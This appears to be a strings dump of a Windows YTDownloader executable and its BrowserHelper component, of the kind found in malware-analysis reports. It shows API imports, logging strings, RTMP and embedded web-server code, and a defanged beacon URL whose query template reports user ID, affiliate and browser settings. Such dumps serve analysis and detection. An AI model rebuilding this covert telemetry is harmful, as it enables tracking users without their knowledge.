inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb

WinExec

KERNEL32.dll

SetWindowsHookExW

UnhookWindowsHookEx

USER32.dll

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegOpenKeyW

RegOpenKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

HttpOpenRequestW

HttpAddRequestHeadersW

HttpSendRequestW

HttpSendRequestExW

HttpEndRequestW

HttpQueryInfoW

WININET.dll

VERSION.dll

PSAPI.DLL

GetCPInfo

GetProcessHeap

zcÁ

.?AVCHttp@@

C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

2/2P3z3

"1*1/141

C1k1y1<3\3c3k3p3t3x3

2%2x2

= >->2>@>

6$6-626?6

;%; ;5;@;

4 4,40444

@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Windows 95

Windows 98

Windows Me

Windows NT

Windows 2000

Windows XP

Windows 2003 Server

Windows Vista

Windows 7

Windows CE

%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

ConfigDB.dll

config.xml

<d/d/%d d:d:d::d 0x%X>

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

kernel32.dll

WININET.DLL

user32.dll

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

PipeName

[CUtils::GetDAPPipeName] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

%d.%d.%d.%d

"%s" "%s"

d/d/%d d:d:d::d

"%s" %s

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

%d-d-d

0.0.0.0

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe

%Program Files%\Internet Explorer\IEXPLORE.EXE

http\shell\open\command

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk

Mozilla Firefox

Google Chrome

explorer.exe

&exe%d=%s&ver%d=%s&arr%d=%s

&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d

hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?

BrowserHelper.txt

BrowserHelperBk.txt

Chrome

Mozilla

iexplore.exe

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

%s?e=%s

zvl=%s&

1.7.0.0

Updater.exe

YTDownloader.exe_2364:

.text

`.rdata

@.data

.idata

.rsrc

@.reloc

SSShh

WSSh(

SPSSh

.tMHtJH

F><.tN<[tJ<\tF<*tB<|t><^t:<$t6

FTPQ

tL<%u@

9>t.hp

;NTu^SSh

xSSSh

FTPjKS

FtPj;S

C.PjRV

1.3.6.1.4.1.311.2.1.12

1.2.840.113549.1.9.5

1.2.840.113549.1.9.6

CRtmpParser::GetFieldDataString

CRtmpParser::GetFieldDataNumber

NetStream.Play.Reset

NetStream.Unpause.Notify

NetStream.Pause.Notify

NetStream.Seek.Notify

NetStream.Play.Stop

NetStream.Play.Failed

NetStream.Failed

()$^.* ?[]|\-{},:=!

video/WebM

"url_encoded_fmt_stream_map": "(.*?)"

rtmpe%3Dyes

url_encoded_fmt_stream_map=

%s, string reference, index: %d, not supported, ignoring!

%s - AMF3 unknown/unsupported datatype 0xx, @%p

AMF3_DATE reference: %d, not supported!

Property: <%s%s>

timestamp: %.2f, UTC offset: %d

INVALID TYPE 0xx

Property: <%sSTRICT_ARRAY>

Property: <%sECMA_ARRAY>

Property: <%sOBJECT>

AMF_Encode - failed to encode property in index %d

%s, invalid type. %d

%s, failed to decode AMF3 property!

Member: %s

Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d

Class reference: %d

Object reference, index: %d

%s: Empty buffer/no buffer pointer!

%s - unknown datatype 0xx, @%p

AMF_TYPED_OBJECT not supported!

AMF_REFERENCE not supported!

%s: Name size out of range: namesize (%d) > len (%d) - 2

%s: Not enough data for decoding with name, less than 4 bytes!

HTTP/1

%s, Setting socket timeout to %ds failed!

%s, No SSL/TLS support

HTTP_get

If-Modified-Since: %s

GET %s HTTP/1.0

User-Agent: %s

Host: %s

Mozilla/5.0

%s, d %s %d d:d:d GMT

size: x

date: %s

ctim: %s

url: %.*s

%s: couldn't open %s for writing, errno %d (%s)

%s: couldn't contact swfurl %s (HTTP error %d)

%s: swfurl %s not found

%s: connection lost while downloading swfurl %s

1.1.4

%s%s\.swfinfo

%s: %s

hXXp://

[[IMPORT]]

No application or playpath in URL!

Invalid port number!

No hostname in URL!

Parsed protocol: %d

RTMP URL: No :// in url!

NetConnection.confStream

NetStream.Publish.Start

NetStream.Play.UnpublishNotify

NetStream.Play.PublishNotify

NetStream.Play.Complete

NetStream.Play.Start

NetConnection.Connect.InvalidApp

NetStream.Play.StreamNotFound

NetStream.Authenticate.UsherToken

Publisher password

pubPasswd

Key for SecureToken response

Justin.tv authentication token

URL to player SWF file

swfUrl

URL of played media's web page

pageUrl

URL to played stream

tcUrl

DH public key does not fulfill y^q mod p = 1

DH public key must be at most p-2

DH public key must be at least 2

RC4 In Key:

RC4 Out Key:

%s: Couldn't calculate correct DH offset (got %d), exiting!

%s: Couldn't calculate correct digest offset (got %d), exiting

%s: Couldn't calculate DH offset (got %d), exiting!

%s: Couldn't calculate digest offset (got %d), exiting!

RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx

Connecting via SOCKS proxy: %s:%d

SWFSize : %u

live : %s

StopTime : %d msec

StartTime : %d msec

flashVer : %s

NetStream.Authenticate.UsherToken : %s

subscribepath : %s

auth : %s

pageUrl : %s

swfUrl : %s

tcUrl : %s

Playpath : %s

Port : %d

Protocol : %s

s %-7s %s

Unknown option %s

%s://%.*s:%d/%.*s

Problem accessing the DNS. (addr: %s)

%s, error

%s, Authentication failed: unknown auth mode: %s

%s, Authentication failed

%s, new app: %.*s tcUrl: %.*s playpath: %s

&nonce=%s&cnonce=%s&nc=%s&response=%s

%s, md5(%s:%s:%s:%s:%s:%s) =>

%s, md5(%s:/%.*s) =>

%s, md5(%s:%s:%s) =>

%s, pubToken1: %s

?%s&user=%s

%s, Authentication failed: no such user

%s, Authentication failed: wrong password

%s, pubToken2: %s

&challenge=%s&response=%s&opaque=%s

%s, b64(md5_2) = %s

%s, b64(%d) = %s

%s, b64(md5_1) = %s

%s, md5(%s%s%s) =>

%s, par:"%s" = val:"%s"

%s, need to set pubUser & pubPasswd for publisher auth

%s, wrong pubUser & pubPasswd for publisher auth

%-22.*s%s

%s, error decoding meta data packet

%s, received: chunk size change to %d

%s: server BW = %d

%s: client BW = %d %d

%s, recv returned %d. GetSockError(): %d (%s)

POST /%s%s/%d HTTP/1.1

Host: %.*s:%d

Content-length: %d

HTTP/1.1 200

%s, RTMP send error %d (%d bytes)

%s: fd=%d, size=%d

Invoking %s

sanity failed!! trying to send header of type: 0xx.

%s, failed to allocate packet

FCSubscribe: %s

UsherToken: %s

%s, %d, pauseTime=%d

%s, seekTime=%d, stopTime=%d, sending play: %s

sending ctrl. type: 0xx

%s: Ignoring SWFVerification request, use --swfVfy!

%s: SWFVerification Type %d request not supported! Patches welcome...

%s, SWFVerification ping received:

%s, Stream Begin %d

%s, Stream EOF %d

%s, Stream Dry %d

%s, Stream IsRecorded %d

%s, Ping %d

%s, Stream BufferEmpty %d

%s, Stream BufferReady %d

%s, Stream xx %d

%s, received ctrl. type: %d, len: %d

%s, RTMP socket closed by peer

%s, No valid HTTP response found

%s, failed to read RTMP packet body. len: %u

%s, failed to read extended timestamp

%s, failed to read RTMP packet header. type: %x

%s, m_nChannel: %0x

%s, failed to read RTMP packet header 3nd byte

%s, failed to read RTMP packet header 2nd byte

%s, failed to read RTMP packet header

%s: fd=%d

%s: client signature does not match!

%s: Handshaking finished....

%s: Genuine Adobe Flash Media Server

%s: Server not genuine Adobe!

%s: Signature calculated:

%s: Digest key:

%s: Server sent signature:

%s: Wait, did the server just refuse signed authentication?

%s: Client signature calculated:

%s: Calculated digest key from secure key and server digest:

%s: Secret key:

%s: Wrong secret key position!

%s: Server DH public key offset: %d

%s: FMS Version : %d.%d.%d.%d

%s: Server Uptime : %d

%s: Type mismatch: client sent %d, server answered %d

%s: Type Answer : X

%s: Initial client digest:

%s: Client digest offset: %d

%s: Couldn't write public key!

%s: Couldn't generate Diffie-Hellmann public key!

%s: DH pubkey position: %d

%s: Couldn't initialize Diffie-Hellmann!

%s: Client type: X

%s: Genuine Adobe Flash Player

%s: Client not genuine Adobe!

%s: Client sent signature:

%s: 2nd handshake:

%s: Sending handshake response:

%s: Server signature calculated:

%s: Client DH public key offset: %d

%s: Player Version: %d.%d.%d.%d

%s: Client Uptime : %d

%s: Initial server digest:

%s: Server digest offset: %d

%s: Unknown version x

%s: Type Requested : X

%s, RTMP connect failed.

%s, handshaked

%s, handshake failed.

%s, ... connected, handshaking

%s, Could not connect for handshake

%s, no SSL/TLS support

%s, SOCKS returned error code %d

%s, failed to create socket. Error: %d

%s, SOCKS negotiation failed.

%s ... SOCKS negotiation

%s, failed to connect socket. %d (%s)

Closing connection: %s

%s, onStatus: %s

trying to connect with redirected url

%s, error description: %s

%s, received error for method call <%s>

%s, received result id %f without matching request

%s, received result for method call <%s>

%s, server invoking <%s>

%s, error decoding invoke packet

%s, Sanity failed. no string method in invoke packet

%s, flex shared object, size %u bytes, not supported, ignoring

%s, flex message, size %u bytes, not fully supported

%s, received: notify %u bytes

%s, shared object, not supported, ignoring

%s, received: invoke %u bytes

%s, unknown packet type received: 0xx

%s, flex stream send, size %u bytes, not supported, ignoring

%s, received: bytes read report

Wrong data size (%u), stream corrupted, aborting!

Couldn't find the seeked keyframe in this chunk!

First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?

FLV Stream: Keyframe doesn't match!

Found keyframe with resume-keyframe timestamp!

Checked keyframe successfully!

ignoring too small audio packet: size: %d

ignoring too small video packet: size: %d

Got Play.Complete or Play.Stop from server. Assuming stream is complete

%s: Failed to close listening socket, error %d

Caught signal: %d, cleaning up, just a second...

-c, --cert cert RTMPS cert

-k, --key key RTMPS key

-p, --port port Overrides the port in the rtmp url

%s, _beginthread failed with %d

Unknown command '%c', ignoring

-o %s

-j "%s"

-p "%s"

-W "%s"

-f "%s"

-a "%s"

-r "%s"

%s, client invoking <%s>

%s, received packet type X, size %u bytes

%s: accept failed

%s: processed request

%s: accepted connection from %s

%s, listen failed

%s, TCP bind failed for port number: %d

%s, couldn't create socket

chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe

._-$,;~()

.mpeg

video/webm

.webm

.xslt

.json

audio/x-mpegurl

.torrent

.jpeg

.shtml

.shtm

.html

url_rewrite_patterns

ssl_certificate

listening_ports

index.html,index.htm,index.cgi,index.shtml,index.php,index.lp

**.shtml$|**.shtm$

mydomain.com

**.cgi$|**.pl$|**.php$

SSL_CTX_use_certificate_chain_file

SSL_CTX_set_default_passwd_cb

SSL_CTX_use_certificate_file

SSL_CTX_use_PrivateKey_file

%s %s:

[0lu] [error] [client %s]

%.*s%s

%d-%3s-%d %d:%d:%d

%*3s, %d %3s %d %d:%d:%d

%d %3s %d %d:%d:%d

%d/%3s/%d %d:%d:%d

%[^:]:%[^:]:%s

HTTP/1.1 401 Unauthorized

WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"

%s:%s:%s

%s.tmp

<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td>  %s</td></tr>

%d-%b-%Y %H:%M

**.htpasswd$

%s%c%s

%a, %d %b %Y %H:%M:%S GMT

HTTP/

%s: CGI env buffer truncated for [%s]

HTTP_%s=%s

REMOTE_USER=%s

PERLLIB=%s

SystemDrive=%s

SYSTEMROOT=%s

COMSPEC=%s

PATH_INFO=%s

PATH=%s

CONTENT_LENGTH=%s

QUERY_STRING=%s

CONTENT_TYPE=%s

HTTPS=%s

PATH_TRANSLATED=%s

SCRIPT_FILENAME=%s

SCRIPT_NAME=%.*s%s

REQUEST_URI=%s

REMOTE_PORT=%d

REMOTE_ADDR=%s

REQUEST_METHOD=%s

SERVER_PORT=%d

SERVER_PROTOCOL=HTTP/1.1

DOCUMENT_ROOT=%s

SERVER_ROOT=%s

SERVER_NAME=%s

Cannot SSI #exec: [%s]: %s

Bad SSI #exec: [%s]

HTTP/1.1 200 OK

<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>

HTTP/1.1 207 Multi-Status

%d.%d.%d.%d%n

%d.%d.%d.%d/%d%n

%lf%c

%s/%s

boundary=™s

HTTP/1.1 302 Found

Location: hXXps://%s:%d%s

24[^:]

%d.%d.%d.%d:%d%n

Cannot add SSL socket, is -ssl_certificate option set?

%s: %.*s: invalid port spec. Expecting list of: %s

[IP_ADDRESS:]PORT[s|p]

%s: cannot bind to %.*s: %s

set_ports_option

%s - %s [%s] "%s %s HTTP/%s" %d %I64d

%d/%b/%Y:%H:%M:%S %z

%s: subnet must be [ |-]x.x.x.x[/x]

Cannot open %s: %s

calloc(): %s

connect(%s:%d): %s

socket(): %s

gethostbyname(%s): %s

%s: %s is not allowed to connect

HTTP/1.1 %d %s

Content-Length: %d

Connection: %s

Error %d: %s

%s: CreateProcess(%s): %ld

%s%s%s\%s

%.*s%c%s

.htpasswd

fopen(%s): %s

%s: cannot open %s: %s

<tr><td><a href="%s%s">%s</a></td><td> %s</td><td>  %s</td></tr>

<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>

Error: opendir(%s): %s

Date: %s

Last-Modified: %s

Etag: %s

HTTP/1.1 100 Continue

Cannot create CGI pipe: %s

fopen: %s

CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]

Cannot spawn CGI process [%s]: %s

put_dir(%s): %s

HTTP/1.1 %d OK

Bad SSI #include: [%s]

Cannot open SSI #include: [%s]: fopen(%s): %s

%s: SSI tag is too large

%s: unknown SSI command: "%s"

SSI #include level is too deep (%s)

Method %s is not implemented

HTTP/1.1 301 Moved Permanently

Location: %s/

remove(%s): %s

Bad HTTP version

Bad HTTP version: [%s]

Invalid URI: [%s]

%s: option value cannot be NULL

Invalid option: %s

warning: %s: duplicate option

Hello from mongoose! Remote port: %d

HttpSendRequestW failed with error code

HttpOpenRequestW failed with error code

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

1.2.5

inflate 1.2.5 Copyright 1995-2010 Mark Adler

Visual C   CRT: Not enough memory to complete call to strerror.

cmd.exe

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb

.?AVCHttp@@

<>"#{}|\^~[]`' ?&

.?AVCRtmpe@@

.?AV?$IBaseInterface@VIKeysBank@@@@

.?AVIKeysBank@@

.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@

.?AVCKeysBank@@

.?AVCRtmpDataProperty@@

.?AVCRtmpPacket@@

.?AVCRtmpParser@@

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

HTTP://

.?AVHttpParser@@

.?AVCHttpDownload@@

zcÁ

WinExec

CreatePipe

KERNEL32.dll

MsgWaitForMultipleObjectsEx

EnumChildWindows

USER32.dll

GDI32.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegOpenKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

WS2_32.dll

LIBEAY32.dll

HttpEndRequestW

HttpQueryInfoW

HttpSendRequestW

HttpSendRequestExW

HttpAddRequestHeadersW

HttpOpenRequestW

WININET.dll

VERSION.dll

CertGetNameStringW

CertFreeCertificateContext

CryptMsgClose

CertCloseStore

CertFindCertificateInStore

CryptMsgGetParam

CRYPT32.dll

PSAPI.DLL

IsValidURL

urlmon.dll

GdiplusShutdown

gdiplus.dll

GetCPInfo

GetProcessHeap

nnn%XXX

pppaSSS

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

89x9

0-161T1k1}1

0(191?1`2

8&9-9}9

<041&3.3

;$;(;,;0;4;8;<;@;

<(</<4<8<<<]<

<&=,=0=4=8=

= =$=(=,=0=4=8=

: :(:,:0;4;

? ?$?,?0?8?<?

? ?(?,?0?

1 2,242\2

?$?0?8?`?

8(848\8|8

0$000\0|0

>(>4><>`>

?$?<?@?\?`?

0 0@0`0|0

3 3@3`3|3

1$1,141<1

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

Content-Disposition: form-data; name="%s"

XXX

Content-Type: multipart/form-data; boundary=%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Windows CE

Windows 7

Windows Vista

Windows 2003 Server

Windows XP

Windows 2000

Windows NT

Windows Me

Windows 98

Windows 95

%sLow\%s\

%C:\Users\Public\Documents\%s\%s\

%s\%s\%s\

%s\Application Data\%s\%s\

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

ConfigDB.dll

config.xml

%%X

<d/d/%d d:d:d::d 0x%X>

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

\StringFileInfo\x\%s

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::BackupTraceFile] %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

CertGetNameString failed.

CryptDecodeObject failed with %x

CertFindCertificateInStore failed with %x

MoreInfo Link : %s

Publisher Link : %s

Program Name : %s

CryptMsgGetParam failed with %x

CryptQueryObject failed with %x

user32.dll

WININET.DLL

kernel32.dll

d/d/%d d:d:d::d

%d.%d.%d.%d

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

"%s" "%s"

"%s" %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPPipeName] Name: %s

PipeName

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey

[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CClientRtmpe::operator =] Key Out: %p

[CClientRtmpe::operator =] Key In:

[CClientRtmpe::operator =]

[CClientRtmpe::OnHandshake] Step 3 - update the keystreams

[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 2 - Client version: %x

[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d

[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d

[CKeysBank::Work] Exit...

[CKeysBank::Work] Enter...

[CKeysBank::Start]

[CKeysBank::Stop]

[CKeysBank::GetPublicKey] Remove Key, Total: %d

[CKeysBank::GenerateKey] Add Key, Total: %d

[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey

[CKeysBank::GenerateKey] ___Error DiffieHellman.Init

[CRtmpe::operator =] Key Out: %p

[CRtmpe::operator =] Key In:

[CRtmpe::operator =]

[CRtmpe::Initialize] Cache Writer: %p

[CRtmpe::ParseHeader] Protocol - RTMPE

[CRtmpe::ParseHeader] Protocol - RTMP

[CRtmpe::ParseHeader]

[CRtmpe::ParseData] Got all %d/%d bytes

[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpe::ParseData]

[CRtmpe::Encrypt] Encryped %d bytes, Key: %p

[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p

[CRtmpe::ParseBuffer] Analyze Next Packet...

[CRtmpe::HandShake] Step 1: Complete

[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server

[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey

[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CRtmpe::HandShake] Step 1: Start...

[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes

[CRtmpe::UpdateBuffer] Handshake already completed

[CRtmpe::UpdateBuffer] Analyzing %d bytes...

[CRtmpStream::OnHandShake] ___Error - Unknown step

[CRtmpe::OnHandshake] Step 3 - Complete

[CRtmpe::OnHandshake] Step 3 - update the keystreams

[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption

[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey

[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CRtmpe::OnHandshake] ___Error Step 3: Writing client response

[CRtmpe::OnHandshake] Step 3: Start...

[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***

[CRtmpe::OnHandshake] ___Warning - server version

[CRtmpe::OnHandshake] ___Error Step 2: Reading server response

[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***

[CRtmpe::OnHandshake] Step 2 - Server version: %x

[CRtmpe::OnHandshake] Step 2 - Server up time: %d

[CRtmpe::OnHandshake] ___Error Step 2: Reading server signature

[CRtmpe::OnHandshake] Step 2 - Protocol: %d

[CRtmpe::OnHandshake] Step 2: Start...

[CRtmpPacket::Reset]

[CRtmpPacket::DumpHeader] Info Field: %d

[CRtmpPacket::DumpHeader] Packet Type: %d

[CRtmpPacket::DumpHeader] Packet Length: %d

[CRtmpPacket::DumpHeader] Absolute Time: %d

[CRtmpPacket::DumpHeader] Time: %d

[CRtmpPacket::DumpHeader] Channel: %d

[CRtmpPacket::DumpHeader] Header Type: %d

[CRtmpPacket::DumpHeader] Header Size: %d

[CRtmpPacket::DumpHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHandshakeHeader] ___Error - Header already parsed

[CRtmpPacket::ParseFlvHeader] Absolute Time: %d

[CRtmpPacket::ParseFlvHeader] Packet Length: %d

[CRtmpPacket::ParseFlvHeader] Packet Type: %d

[CRtmpPacket::ParseFlvHeader] Channel: %d

[CRtmpPacket::ParseFlvHeader] Header Type: %d

[CRtmpPacket::ParseFlvHeader] Header Size: %d

[CRtmpPacket::ParseFlvHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseFlvHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseFlvHeader] ___Error - Header already parsed

[CRtmpPacket::AppendData] Appended: %d (Total: %d/%d)

[CRtmpPacket::AppendData] ___Error - out of memory

[CRtmpPacket::AppendData] ___Warning - no bytes to append

[CRtmpPacket::Allocate] Allocated %d (Total: %d)

[CRtmpPacket::ParseHeader] ___Error - Channel: %d > 9

[CRtmpPacket::ParseHeader] Extended Time: %d

[CRtmpPacket::ParseHeader] Info Field: %d

[CRtmpPacket::ParseHeader] ___Warning - Packet Length: %d > 1M

[CRtmpPacket::ParseHeader] Packet Type: %d

[CRtmpPacket::ParseHeader] Packet Size: %d

[CRtmpPacket::ParseHeader] Time: %d

[CRtmpPacket::ParseHeader] Channel: %d

[CRtmpPacket::ParseHeader] Header Type: %d

[CRtmpPacket::ParseHeader] Header Size: %d

[CRtmpPacket::ParseHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseHeader] ___Error - Header already parsed

[CRtmpParser::Stop]

[CRtmpParser::ProcessData] ___Error - Unknown Packet Type: %d, Offset: %d

